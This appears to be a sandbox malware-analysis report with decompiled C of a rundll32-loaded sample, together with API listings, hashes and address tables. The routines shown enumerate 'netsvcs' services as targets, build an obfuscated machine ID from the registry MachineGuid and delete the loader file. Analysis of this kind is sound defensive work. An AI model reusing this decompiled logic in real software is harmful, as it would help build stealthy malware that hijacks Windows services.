                                                            • Opcode ID: 637d4209b84fe85680d6f0bc709baff96a0949095ebd44b298d43a65d291c887
                                                            • Instruction ID: feb3bb408aac2ed64c8e3475daaaff3933090628a70bd7787950a7412da9c7d4
                                                            • Opcode Fuzzy Hash: 637d4209b84fe85680d6f0bc709baff96a0949095ebd44b298d43a65d291c887
                                                            • Instruction Fuzzy Hash: C591B0B1284301AFEB14EF658C49F6B7AE9EFD5B14F00051CF654D6280FB74E9098BA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 61%
                                                            			E0464BD60(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v408;
                                                            				struct _QUERY_SERVICE_CONFIG* _v412;
                                                            				char _v416;
                                                            				short* _v420;
                                                            				char _v424;
                                                            				intOrPtr _v428;
                                                            				void* _v432;
                                                            				short* _v436;
                                                            				int _v440;
                                                            				intOrPtr _v444;
                                                            				intOrPtr _v448;
                                                            				signed int _t58;
                                                            				void* _t63;
                                                            				char _t68;
                                                            				void* _t69;
                                                            				void* _t71;
                                                            				intOrPtr _t72;
                                                            				void* _t79;
                                                            				void* _t80;
                                                            				WCHAR* _t85;
                                                            				signed int _t87;
                                                            				void* _t101;
                                                            				long _t102;
                                                            				void* _t103;
                                                            				void* _t108;
                                                            				intOrPtr _t112;
                                                            				intOrPtr _t123;
                                                            				void* _t124;
                                                            				void* _t126;
                                                            				void* _t128;
                                                            				intOrPtr* _t132;
                                                            				signed int _t134;
                                                            				intOrPtr* _t137;
                                                            				signed int _t142;
                                                            				void* _t143;
                                                            				void* _t144;
                                                            
                                                            				_t124 = __edi;
                                                            				_t58 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t58 ^ _t142;
                                                            				_v448 = __edx;
                                                            				_v436 = 0;
                                                            				_v424 = 0;
                                                            				_v416 = 0;
                                                            				_v420 = 0;
                                                            				_v444 = __ecx;
                                                            				E0465DEA0(__edi,  &_v408, 0, 0x190);
                                                            				_t144 = _t143 + 0xc;
                                                            				_t63 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                            				_t101 = _t63;
                                                            				_v412 = _t101;
                                                            				if(_t101 != 0) {
                                                            					_t132 = __imp__EnumServicesStatusExW;
                                                            					 *_t132(_t101, 0, 0x30, 1, 0, 0,  &_v424,  &_v416,  &_v420, 0, __esi);
                                                            					_t68 = _v424;
                                                            					if(_t68 != 0) {
                                                            						_push(_t124);
                                                            						_t102 = _t68 + 0x2c;
                                                            						_t69 = LocalAlloc(0x40, _t102); // executed
                                                            						_v432 = _t69;
                                                            						if(_t69 != 0) {
                                                            							_push(0);
                                                            							_v420 = 0;
                                                            							_push( &_v420);
                                                            							_push( &_v416);
                                                            							_push( &_v424);
                                                            							_push(_t102);
                                                            							_t103 = _v412;
                                                            							_push(_t69);
                                                            							_push(1);
                                                            							_push(0x30);
                                                            							_push(0);
                                                            							_push(_t103);
                                                            							if( *_t132() != 0) {
                                                            								_t71 = LocalAlloc(0x40, 0x2000); // executed
                                                            								_t126 = CloseServiceHandle;
                                                            								_t108 = _t71;
                                                            								_t72 = 0;
                                                            								_v412 = _t108;
                                                            								_v440 = 0;
                                                            								_v428 = 0;
                                                            								if(_v416 > 0) {
                                                            									_t137 = _v432 + 0x24;
                                                            									asm("o16 nop [eax+eax]");
                                                            									do {
                                                            										if( *((intOrPtr*)(_t137 - 0x18)) == 4) {
                                                            											_t80 = OpenServiceW(_t103,  *(_t137 - 0x24), 1); // executed
                                                            											_t128 = _t80;
                                                            											if(_t128 == 0) {
                                                            												_t126 = CloseServiceHandle;
                                                            											} else {
                                                            												if(QueryServiceConfigW(_t128, _v412, 0x2000,  &_v440) == 0) {
                                                            													L21:
                                                            													_t126 = CloseServiceHandle;
                                                            													CloseServiceHandle(_t128);
                                                            												} else {
                                                            													_t85 =  *(_v412 + 0xc);
                                                            													if(_t85 != 0 && StrStrIW(_t85, L"-k netsvcs") != 0) {
                                                            														_t123 =  *_t137;
                                                            														_t87 = 0;
                                                            														asm("o16 nop [eax+eax]");
                                                            														while(1) {
                                                            															_t112 =  *((intOrPtr*)(_t142 + _t87 * 4 - 0x194));
                                                            															if(_t112 == _t123) {
                                                            																goto L21;
                                                            															}
                                                            															if(_t112 == 0) {
                                                            																 *((intOrPtr*)(_t142 + _t87 * 4 - 0x194)) = _t123;
                                                            																goto L21;
                                                            															} else {
                                                            																_t87 = _t87 + 1;
                                                            																if(_t87 < 0x64) {
                                                            																	continue;
                                                            																} else {
                                                            																	_t126 = CloseServiceHandle;
                                                            																	CloseServiceHandle(_t128);
                                                            																}
                                                            															}
                                                            															goto L23;
                                                            														}
                                                            													}
                                                            													goto L21;
                                                            												}
                                                            											}
                                                            											L23:
                                                            											_t72 = _v428;
                                                            										}
                                                            										_t72 = _t72 + 1;
                                                            										_t137 = _t137 + 0x2c;
                                                            										_v428 = _t72;
                                                            									} while (_t72 < _v416);
                                                            									_t108 = _v412;
                                                            								}
                                                            								LocalFree(_t108);
                                                            								LocalFree(_v432);
                                                            								CloseServiceHandle(_t103);
                                                            								_t134 = 0;
                                                            								while(1) {
                                                            									_t109 =  *((intOrPtr*)(_t142 + _t134 * 4 - 0x194));
                                                            									if( *((intOrPtr*)(_t142 + _t134 * 4 - 0x194)) == 0) {
                                                            										break;
                                                            									}
                                                            									_t122 = _v444;
                                                            									if(_v444 != 0) {
                                                            										_t78 = _v448;
                                                            										if(_v448 != 0) {
                                                            											_t79 = E04649000(_t103, _t109, _t122, _t126, _t134, _t78); // executed
                                                            											_t144 = _t144 + 4;
                                                            											if(_t79 != 0) {
                                                            												_v436 = _v436 + 1;
                                                            											}
                                                            										}
                                                            									}
                                                            									_t134 = _t134 + 1;
                                                            									if(_t134 < 0x64) {
                                                            										continue;
                                                            									}
                                                            									break;
                                                            								}
                                                            								return E04655AFE(_v8 ^ _t142);
                                                            							} else {
                                                            								CloseServiceHandle(_t103);
                                                            								LocalFree(_v432);
                                                            								return E04655AFE(_v8 ^ _t142);
                                                            							}
                                                            						} else {
                                                            							CloseServiceHandle(_v412);
                                                            							return E04655AFE(_v8 ^ _t142);
                                                            						}
                                                            					} else {
                                                            						CloseServiceHandle(_t101);
                                                            						return E04655AFE(_v8 ^ _t142);
                                                            					}
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t142);
                                                            				}
                                                            			}








































                                                            0x0464bd60
                                                            0x0464bd69
                                                            0x0464bd70
                                                            0x0464bd75
                                                            0x0464bd82
                                                            0x0464bd88
                                                            0x0464bd8e
                                                            0x0464bd94
                                                            0x0464bda1
                                                            0x0464bda7
                                                            0x0464bdac
                                                            0x0464bdb8
                                                            0x0464bdbe
                                                            0x0464bdc0
                                                            0x0464bdc8
                                                            0x0464bdda
                                                            0x0464be02
                                                            0x0464be04
                                                            0x0464be0c
                                                            0x0464be27
                                                            0x0464be2e
                                                            0x0464be34
                                                            0x0464be36
                                                            0x0464be3e
                                                            0x0464be5f
                                                            0x0464be67
                                                            0x0464be71
                                                            0x0464be78
                                                            0x0464be7f
                                                            0x0464be80
                                                            0x0464be81
                                                            0x0464be87
                                                            0x0464be88
                                                            0x0464be8a
                                                            0x0464be8c
                                                            0x0464be8e
                                                            0x0464be93
                                                            0x0464bec3
                                                            0x0464bec5
                                                            0x0464becb
                                                            0x0464becd
                                                            0x0464becf
                                                            0x0464bed5
                                                            0x0464bedf
                                                            0x0464beeb
                                                            0x0464bef7
                                                            0x0464befa
                                                            0x0464bf00
                                                            0x0464bf04
                                                            0x0464bf10
                                                            0x0464bf16
                                                            0x0464bf1a
                                                            0x0464bf92
                                                            0x0464bf1c
                                                            0x0464bf37
                                                            0x0464bf87
                                                            0x0464bf88
                                                            0x0464bf8e
                                                            0x0464bf39
                                                            0x0464bf3f
                                                            0x0464bf44
                                                            0x0464bf56
                                                            0x0464bf58
                                                            0x0464bf5a
                                                            0x0464bf60
                                                            0x0464bf60
                                                            0x0464bf69
                                                            0x00000000
                                                            0x00000000
                                                            0x0464bf6d
                                                            0x0464bf80
                                                            0x00000000
                                                            0x0464bf6f
                                                            0x0464bf6f
                                                            0x0464bf73
                                                            0x00000000
                                                            0x0464bf75
                                                            0x0464bf76
                                                            0x0464bf7c
                                                            0x0464bf7c
                                                            0x0464bf73
                                                            0x00000000
                                                            0x0464bf6d
                                                            0x0464bf60
                                                            0x00000000
                                                            0x0464bf44
                                                            0x0464bf37
                                                            0x0464bf98
                                                            0x0464bf98
                                                            0x0464bf98
                                                            0x0464bf9e
                                                            0x0464bf9f
                                                            0x0464bfa2
                                                            0x0464bfa8
                                                            0x0464bfb4
                                                            0x0464bfb4
                                                            0x0464bfc1
                                                            0x0464bfc9
                                                            0x0464bfcc
                                                            0x0464bfce
                                                            0x0464bfd0
                                                            0x0464bfd0
                                                            0x0464bfd9
                                                            0x00000000
                                                            0x00000000
                                                            0x0464bfdb
                                                            0x0464bfe3
                                                            0x0464bfe5
                                                            0x0464bfed
                                                            0x0464bff0
                                                            0x0464bff5
                                                            0x0464bffa
                                                            0x0464bffc
                                                            0x0464bffc
                                                            0x0464bffa
                                                            0x0464bfed
                                                            0x0464c002
                                                            0x0464c006
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464c006
                                                            0x0464c01e
                                                            0x0464be95
                                                            0x0464be96
                                                            0x0464bea3
                                                            0x0464bebb
                                                            0x0464bebb
                                                            0x0464be40
                                                            0x0464be46
                                                            0x0464be5e
                                                            0x0464be5e
                                                            0x0464be0e
                                                            0x0464be0f
                                                            0x0464be26
                                                            0x0464be26
                                                            0x0464bdcb
                                                            0x0464bdd8
                                                            0x0464bdd8

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?), ref: 0464BDB8
                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,00000000,?,?,?,00000000,00000000,?,?,?), ref: 0464BE02
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?), ref: 0464BE0F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEnumHandleManagerOpenServiceServicesStatus
                                                            • String ID: -k netsvcs
                                                            • API String ID: 236840872-1604415765
                                                            • Opcode ID: 40e04cdff3de49c9f8bfdc2c8e4c053ae759d5780ae8e0d08a1f70577e1fd8ad
                                                            • Instruction ID: 60cf0da439774d0664b8df91f040a05307f25d757627b26d7bb99ec2dbf95d7f
                                                            • Opcode Fuzzy Hash: 40e04cdff3de49c9f8bfdc2c8e4c053ae759d5780ae8e0d08a1f70577e1fd8ad
                                                            • Instruction Fuzzy Hash: EA718071A012189FEF649F65DC84BEAB7B9EF99710F1100E9E90DE7241EB71AD408F50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 78%
                                                            			E04645CA0(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				int _v540;
                                                            				intOrPtr _v556;
                                                            				void* _v564;
                                                            				int _v568;
                                                            				signed int _t11;
                                                            				void* _t14;
                                                            				int _t16;
                                                            				long _t29;
                                                            				void* _t31;
                                                            				signed int _t32;
                                                            
                                                            				_t11 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t11 ^ _t32;
                                                            				_t29 = GetCurrentProcessId();
                                                            				_v568 = 0;
                                                            				_t14 = CreateToolhelp32Snapshot(2, 0); // executed
                                                            				_t31 = _t14;
                                                            				_v564 = 0x22c;
                                                            				_push( &_v564);
                                                            				_t16 = Process32FirstW(_t31); // executed
                                                            				if(_t16 != 0) {
                                                            					while(_v556 != _t29) {
                                                            						if(Process32NextW(_t31,  &_v564) != 0) {
                                                            							continue;
                                                            						} else {
                                                            						}
                                                            						L6:
                                                            						goto L7;
                                                            					}
                                                            					_v568 = _v540;
                                                            					goto L6;
                                                            				}
                                                            				L7:
                                                            				FindCloseChangeNotification(_t31); // executed
                                                            				return E04655AFE(_v8 ^ _t32);
                                                            			}














                                                            0x04645ca9
                                                            0x04645cb0
                                                            0x04645cbf
                                                            0x04645cc1
                                                            0x04645ccb
                                                            0x04645cd1
                                                            0x04645cd3
                                                            0x04645ce3
                                                            0x04645ce5
                                                            0x04645ced
                                                            0x04645cf6
                                                            0x04645d0a
                                                            0x00000000
                                                            0x00000000
                                                            0x04645d0c
                                                            0x04645d1a
                                                            0x00000000
                                                            0x04645d1a
                                                            0x04645d14
                                                            0x00000000
                                                            0x04645d14
                                                            0x04645d1b
                                                            0x04645d1c
                                                            0x04645d37

                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?,74CB4DC0), ref: 04645CB5
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04645CCB
                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 04645CE5
                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 04645D06
                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 04645D1C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process32$ChangeCloseCreateCurrentFindFirstNextNotificationProcessSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 1594840063-0
                                                            • Opcode ID: bb876c8c4d321a5e7614f1bba84db3da607ffce4040a7e56f84b5e2ac3d25e5c
                                                            • Instruction ID: 9a56b4ed027879995f2de30101c186a7b35e79593f16ded543d16000bd105cb7
                                                            • Opcode Fuzzy Hash: bb876c8c4d321a5e7614f1bba84db3da607ffce4040a7e56f84b5e2ac3d25e5c
                                                            • Instruction Fuzzy Hash: B6014471601228ABDB10EF54DC8CBADB7B8EF45350F1001D9E909D3240FB386E45CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 77%
                                                            			E04646050(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr _v68;
                                                            				intOrPtr _v72;
                                                            				intOrPtr _v76;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				char _v88;
                                                            				intOrPtr _v92;
                                                            				intOrPtr _v96;
                                                            				intOrPtr _v100;
                                                            				intOrPtr _v104;
                                                            				intOrPtr _v108;
                                                            				short _v112;
                                                            				intOrPtr _v116;
                                                            				intOrPtr _v120;
                                                            				intOrPtr _v124;
                                                            				intOrPtr _v128;
                                                            				intOrPtr _v132;
                                                            				intOrPtr _v136;
                                                            				intOrPtr _v140;
                                                            				intOrPtr _v144;
                                                            				intOrPtr _v148;
                                                            				intOrPtr _v152;
                                                            				intOrPtr _v156;
                                                            				intOrPtr _v160;
                                                            				intOrPtr _v164;
                                                            				intOrPtr _v168;
                                                            				intOrPtr _v172;
                                                            				short _v176;
                                                            				char _v252;
                                                            				void* _v256;
                                                            				int _v260;
                                                            				intOrPtr _v264;
                                                            				int _v268;
                                                            				signed int _t110;
                                                            				long _t117;
                                                            				intOrPtr _t118;
                                                            				signed int _t119;
                                                            				intOrPtr* _t142;
                                                            				void* _t144;
                                                            				signed int _t145;
                                                            				signed int _t147;
                                                            				signed short* _t156;
                                                            				signed int _t166;
                                                            				intOrPtr* _t169;
                                                            				signed int _t171;
                                                            				void* _t173;
                                                            				signed int _t175;
                                                            
                                                            				_t110 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t110 ^ _t175;
                                                            				_v264 = __edx;
                                                            				_v12 = 0;
                                                            				_v88 = 0x47007b;
                                                            				_t142 = __ecx;
                                                            				_v84 = 0x350036;
                                                            				_v80 = 0x590037;
                                                            				_v76 = 0x300053;
                                                            				_v72 = 0x2d0036;
                                                            				_v68 = 0x310030;
                                                            				_v64 = 0x440036;
                                                            				_v60 = 0x34002d;
                                                            				_v56 = 0x300043;
                                                            				_v52 = 0x2d0052;
                                                            				_v48 = 0x300036;
                                                            				_v44 = 0x320032;
                                                            				_v40 = 0x46002d;
                                                            				_v36 = 0x450047;
                                                            				_v32 = 0x430032;
                                                            				_v28 = 0x320033;
                                                            				_v24 = 0x360032;
                                                            				_v20 = 0x370036;
                                                            				_v16 = 0x7d0046;
                                                            				_v260 = 0x4a;
                                                            				_v176 = 0x4f0053;
                                                            				_v172 = 0x540046;
                                                            				_v168 = 0x410057;
                                                            				_v164 = 0x450052;
                                                            				_v160 = 0x4d005c;
                                                            				_v156 = 0x630069;
                                                            				_v152 = 0x6f0072;
                                                            				_v148 = 0x6f0073;
                                                            				_v144 = 0x740066;
                                                            				_v140 = 0x43005c;
                                                            				_v136 = 0x790072;
                                                            				_v132 = 0x740070;
                                                            				_v128 = 0x67006f;
                                                            				_v124 = 0x610072;
                                                            				_v120 = 0x680070;
                                                            				_v116 = 0x79;
                                                            				_v112 = 0x61004d;
                                                            				_v108 = 0x680063;
                                                            				_v104 = 0x6e0069;
                                                            				_v100 = 0x470065;
                                                            				_v96 = 0x690075;
                                                            				_v92 = 0x64;
                                                            				E0465DEA0(__edi,  &_v252, 0, 0x4a);
                                                            				_v256 = 0;
                                                            				_t117 = RegOpenKeyExW(0x80000002,  &_v176, 0, 0x20119,  &_v256); // executed
                                                            				if(_t117 == 0) {
                                                            					RegQueryValueExW(_v256,  &_v112, 0,  &_v268,  &_v252,  &_v260); // executed
                                                            					_t174 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v256);
                                                            					_t180 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) != 0 && _v260 == 0x4a) {
                                                            						asm("movups xmm0, [ebp-0xf8]");
                                                            						asm("movups [ebp-0x52], xmm0");
                                                            						asm("movups xmm0, [ebp-0xe8]");
                                                            						asm("movups [ebp-0x42], xmm0");
                                                            						asm("movups xmm0, [ebp-0xd8]");
                                                            						asm("movups [ebp-0x32], xmm0");
                                                            						asm("movups xmm0, [ebp-0xc8]");
                                                            						asm("movups [ebp-0x22], xmm0");
                                                            						asm("movq xmm0, [ebp-0xb8]");
                                                            						asm("movq [ebp-0x12], xmm0");
                                                            					}
                                                            				}
                                                            				_t169 = _t142;
                                                            				_t144 = _t169 + 2;
                                                            				do {
                                                            					_t118 =  *_t169;
                                                            					_t169 = _t169 + 2;
                                                            				} while (_t118 != 0);
                                                            				_t166 = 1;
                                                            				_t171 = _t169 - _t144 >> 1;
                                                            				asm("o16 nop [eax+eax]");
                                                            				do {
                                                            					_t119 =  *(_t175 + _t166 * 2 - 0x54) & 0x0000ffff;
                                                            					if(_t119 >= 0x61 && _t119 <= 0x7a) {
                                                            						 *(_t175 + _t166 * 2 - 0x54) = _t119 + 0xffffffe0;
                                                            					}
                                                            					if( *(_t175 + _t166 * 2 - 0x54) != 0x2d) {
                                                            						asm("cdq");
                                                            						 *(_t175 + _t166 * 2 - 0x54) =  *(_t175 + _t166 * 2 - 0x54) ^  *(_t142 + _t166 % _t171 * 2);
                                                            						_t145 =  *(_t175 + _t166 * 2 - 0x54) & 0x0000ffff;
                                                            						if(_t145 >= 0x30) {
                                                            							_t89 = _t145 - 0x3a; // -13
                                                            							if(_t89 > 6) {
                                                            								if(_t145 > 0x5a) {
                                                            									 *(_t175 + _t166 * 2 - 0x54) = 0x5a - _t145 % 0x1a;
                                                            								}
                                                            							} else {
                                                            								 *(_t175 + _t166 * 2 - 0x54) = _t145 % 0x1a + 0x41;
                                                            							}
                                                            						} else {
                                                            							 *(_t175 + _t166 * 2 - 0x54) = _t145 % 0xa + 0x30;
                                                            						}
                                                            					}
                                                            					_t166 = _t166 + 1;
                                                            				} while (_t166 < 0x25);
                                                            				_t156 =  &_v88;
                                                            				_t173 = _v264 - _t156;
                                                            				do {
                                                            					_t147 =  *_t156 & 0x0000ffff;
                                                            					_t156 =  &(_t156[1]);
                                                            					 *(_t173 + _t156 - 2) = _t147;
                                                            				} while (_t147 != 0);
                                                            				return E04655AFE(_v8 ^ _t175);
                                                            			}

































































                                                            0x04646059
                                                            0x04646060
                                                            0x04646068
                                                            0x04646070
                                                            0x0464607c
                                                            0x04646085
                                                            0x04646087
                                                            0x0464608e
                                                            0x04646095
                                                            0x0464609c
                                                            0x046460a3
                                                            0x046460aa
                                                            0x046460b1
                                                            0x046460b8
                                                            0x046460bf
                                                            0x046460c6
                                                            0x046460cd
                                                            0x046460d4
                                                            0x046460db
                                                            0x046460e2
                                                            0x046460e9
                                                            0x046460f0
                                                            0x046460f7
                                                            0x046460fe
                                                            0x04646105
                                                            0x0464610f
                                                            0x04646119
                                                            0x04646123
                                                            0x0464612d
                                                            0x04646137
                                                            0x04646141
                                                            0x0464614b
                                                            0x04646155
                                                            0x0464615f
                                                            0x04646169
                                                            0x04646173
                                                            0x0464617d
                                                            0x04646184
                                                            0x0464618b
                                                            0x04646192
                                                            0x04646199
                                                            0x046461a0
                                                            0x046461a7
                                                            0x046461ae
                                                            0x046461b5
                                                            0x046461bc
                                                            0x046461c3
                                                            0x046461ca
                                                            0x046461d2
                                                            0x046461f1
                                                            0x046461f9
                                                            0x0464621f
                                                            0x04646232
                                                            0x04646235
                                                            0x0464623b
                                                            0x0464623d
                                                            0x04646248
                                                            0x0464624f
                                                            0x04646253
                                                            0x0464625a
                                                            0x0464625e
                                                            0x04646265
                                                            0x04646269
                                                            0x04646270
                                                            0x04646274
                                                            0x0464627c
                                                            0x0464627c
                                                            0x0464623d
                                                            0x04646281
                                                            0x04646283
                                                            0x04646286
                                                            0x04646286
                                                            0x04646289
                                                            0x0464628c
                                                            0x04646293
                                                            0x04646298
                                                            0x0464629a
                                                            0x046462a0
                                                            0x046462a0
                                                            0x046462a8
                                                            0x046462b2
                                                            0x046462b2
                                                            0x046462bd
                                                            0x046462c1
                                                            0x046462c8
                                                            0x046462cd
                                                            0x046462d5
                                                            0x046462ec
                                                            0x046462f3
                                                            0x0464630d
                                                            0x04646321
                                                            0x04646321
                                                            0x046462f5
                                                            0x04646303
                                                            0x04646303
                                                            0x046462d7
                                                            0x046462e5
                                                            0x046462e5
                                                            0x046462d5
                                                            0x04646326
                                                            0x04646327
                                                            0x04646336
                                                            0x0464633d
                                                            0x04646340
                                                            0x04646340
                                                            0x04646343
                                                            0x04646346
                                                            0x0464634b
                                                            0x04646360

                                                            APIs
                                                            • RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                            • RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                            • RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: -$-$-$0$2$2$2$3$6$6$6$6$6$7$C$F$F$G$J$M$R$R$S$S$W$\$\$c$d$e$f$i$i$o$p$p$r$r$r$s$u$y
                                                            • API String ID: 3677997916-1672344200
                                                            • Opcode ID: 7b90442ebcd07b23da58d74e1b24e8fa5cc1d390b5fec1958994000bd441440e
                                                            • Instruction ID: c18e3699a8c8d5f31161716c76eb1ea89fb202f28fbb988f754a06fa63a47b37
                                                            • Opcode Fuzzy Hash: 7b90442ebcd07b23da58d74e1b24e8fa5cc1d390b5fec1958994000bd441440e
                                                            • Instruction Fuzzy Hash: 27818DB0E0025DCBDF258F94D9487EEBBB5FF45304F0091AAD409AB201E7B95A89CF84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 92%
                                                            			E0464C250(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v208;
                                                            				short _v728;
                                                            				short _v1248;
                                                            				short _v1768;
                                                            				long _v1772;
                                                            				signed int _t19;
                                                            				int _t31;
                                                            				int _t34;
                                                            				void* _t37;
                                                            				signed int _t39;
                                                            				void* _t43;
                                                            				void* _t46;
                                                            				void* _t48;
                                                            				void* _t50;
                                                            				void* _t58;
                                                            				void* _t61;
                                                            				void* _t64;
                                                            				void* _t67;
                                                            				intOrPtr _t68;
                                                            				intOrPtr _t70;
                                                            				void* _t93;
                                                            				long _t94;
                                                            				void* _t96;
                                                            				void* _t97;
                                                            				void* _t98;
                                                            				signed int _t99;
                                                            
                                                            				_t64 = __ecx;
                                                            				_t61 = __ebx;
                                                            				_t19 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t19 ^ _t99;
                                                            				_t96 = GetModuleFileNameW;
                                                            				_t93 = __ecx;
                                                            				GetModuleFileNameW(0,  &_v1248, 0x104);
                                                            				if(lstrcmpiW(E0465D9BE( &_v1248, 0x5c) + 2, L"rundll32.exe") != 0) {
                                                            					GetModuleFileNameW(0,  &_v728, 0x104);
                                                            					_t31 = E0465D9BE( &_v728, 0x2e) + 2;
                                                            					__eflags = _t31;
                                                            					if(_t31 != 0) {
                                                            						_t67 =  *L"dat"; // 0x610064
                                                            						 *_t31 = _t67;
                                                            						_t68 =  *0x467f710; // 0x74
                                                            						 *((intOrPtr*)(_t31 + 4)) = _t68;
                                                            						_t34 = PathFileExistsW( &_v728);
                                                            						__eflags = _t34;
                                                            						if(_t34 != 0) {
                                                            							goto L5;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_push(_t64);
                                                            					_t58 = E0464C130(_t93,  &_v1768,  &_v728);
                                                            					_t106 = _t58;
                                                            					if(_t58 != 0) {
                                                            						MoveFileExW( &_v1768, 0, 4); // executed
                                                            						L5:
                                                            						E0465DEA0(_t93,  &_v208, 0, 0xc8);
                                                            						_t37 = E04646FC0(_t61,  &_v208, _t93, _t96, _t106); // executed
                                                            						_t97 = _t37;
                                                            						_t107 = _t97;
                                                            						if(_t97 <= 0) {
                                                            							_t70 =  *0x46865f8; // 0x38f, executed
                                                            							E04646C70(_t61, _t70, _t93, _t97, __eflags); // executed
                                                            						} else {
                                                            							E04646C70(_t61, _t97, _t93, _t97, _t107);
                                                            							E04646DF0( &_v208, _t97);
                                                            						}
                                                            						_t39 = E04645960(); // executed
                                                            						_v1772 = 0;
                                                            						asm("sbb eax, eax");
                                                            						_t43 = E04649770( &_v1772,  &_v728,  ~( ~_t39) + 1); // executed
                                                            						_t98 = _t43;
                                                            						if(_t98 != 0) {
                                                            							_t94 = _v1772;
                                                            							_t109 = _t94;
                                                            							if(_t94 != 0) {
                                                            								E046496B0(_t61, _t98, _t94, _t94, _t98, _t109); // executed
                                                            								E04645540(_t98, _t94);
                                                            								_t46 = E046494D0(_t61, L"Control", _t94, _t98, _t109); // executed
                                                            								if(_t46 == 0x1fffffff || _t46 == 0x2fffffff) {
                                                            									E046378B0(_t61, L"Control", 0, _t94, _t98, 0);
                                                            								}
                                                            								_t48 = E046494D0(_t61, L"Dispatch", _t94, _t98, 0); // executed
                                                            								if(_t48 == 0x1fffffff || _t48 == 0x2fffffff) {
                                                            									E046378B0(_t61, L"Dispatch", 0, _t94, _t98, 0);
                                                            								}
                                                            								_t50 = E0464BD60(_t61, _t98, _t94, _t94, _t98); // executed
                                                            								if(_t50 <= 0) {
                                                            									_push(_t61);
                                                            									do {
                                                            										L0464BBC0();
                                                            										Sleep(0x3e8);
                                                            									} while (E0464BD60(Sleep, _t98, _t94, _t94, _t98) <= 0);
                                                            								}
                                                            								VirtualFree(_t98, 0, 0x8000); // executed
                                                            								DeleteFileW( &_v728); // executed
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t99);
                                                            			}






























                                                            0x0464c250
                                                            0x0464c250
                                                            0x0464c259
                                                            0x0464c260
                                                            0x0464c264
                                                            0x0464c279
                                                            0x0464c27b
                                                            0x0464c2a5
                                                            0x0464c2dc
                                                            0x0464c2ef
                                                            0x0464c2ef
                                                            0x0464c2f2
                                                            0x0464c2f8
                                                            0x0464c2fe
                                                            0x0464c300
                                                            0x0464c306
                                                            0x0464c310
                                                            0x0464c316
                                                            0x0464c318
                                                            0x00000000
                                                            0x00000000
                                                            0x0464c318
                                                            0x0464c2a7
                                                            0x0464c2a7
                                                            0x0464c2b1
                                                            0x0464c2b9
                                                            0x0464c2bb
                                                            0x0464c2cc
                                                            0x0464c31e
                                                            0x0464c32c
                                                            0x0464c33a
                                                            0x0464c33f
                                                            0x0464c341
                                                            0x0464c343
                                                            0x0464c35b
